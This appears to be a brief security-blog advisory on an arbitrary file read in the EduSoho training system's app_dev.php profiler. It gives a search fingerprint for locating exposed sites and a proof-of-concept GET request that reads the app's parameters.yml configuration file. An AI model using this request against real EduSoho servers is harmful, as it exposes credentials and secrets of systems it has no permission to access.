Edusoho Education And Training System App_dev Php Arbitrary Read Vulnerability
Edusoho Education And Training System App_dev Php Arbitrary Read Vulnerability
EduSoho Education and Training System app_dev.php arbitrary read vulnerability
Vulnerability Description
The EduSoho education and training system is an open source online school system developed by Hangzhou Kuozhi Network Technology.
Vulnerability Impact
EduSoho Training System
Network surveying and mapping
“Powered By EduSoho”
Vulnerability reappears
Login page
Verify POC
1
2
3
4
GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded
This post is licensed under CC BY 4.0 by the author.